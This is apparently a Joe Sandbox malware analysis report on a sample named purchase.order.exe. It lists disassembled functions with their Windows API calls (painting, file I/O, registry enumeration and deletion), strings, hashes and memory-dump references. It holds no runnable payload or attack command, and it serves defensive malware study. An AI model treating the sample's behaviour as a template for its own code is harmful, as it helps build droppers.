                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: : Completed$N
                                          • API String ID: 3103080414-2140067464
                                          • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                          • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                          • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                          • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                          • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                          • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                          • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                          Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                          • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                            • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                            • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                          • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                          • wsprintfA.USER32 ref: 00406206
                                          • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                          • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                            • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                            • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]
                                          • API String ID: 2171350718-461813615
                                          • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                          • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                          • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                          • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                          Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                          • CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 00406833
                                          • *?|<>/":, xrefs: 00406841
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-3170120941
                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                          Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                          • GetSysColor.USER32(00000000), ref: 00404582
                                          • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                          • SetBkMode.GDI32(?,?), ref: 0040459A
                                          • GetSysColor.USER32(?), ref: 004045AD
                                          • SetBkColor.GDI32(?,?), ref: 004045BD
                                          • DeleteObject.GDI32(?), ref: 004045D7
                                          • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                          Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                            • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                          • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                          • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                          • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                          Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                          • GetMessagePos.USER32 ref: 00404E9E
                                          • ScreenToClient.USER32(?,?), ref: 00404EB8
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                          • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                          • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                          Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 00401E76
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID: Calibri
                                          • API String ID: 3808545654-1409258342
                                          • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                          • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                          • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                          • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                          Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                          • MulDiv.KERNEL32(000C3728,00000064,000C392C), ref: 00403001
                                          • wsprintfW.USER32 ref: 00403011
                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040300B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                          • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                          • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                          • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                          Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                          • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                          • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                          Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
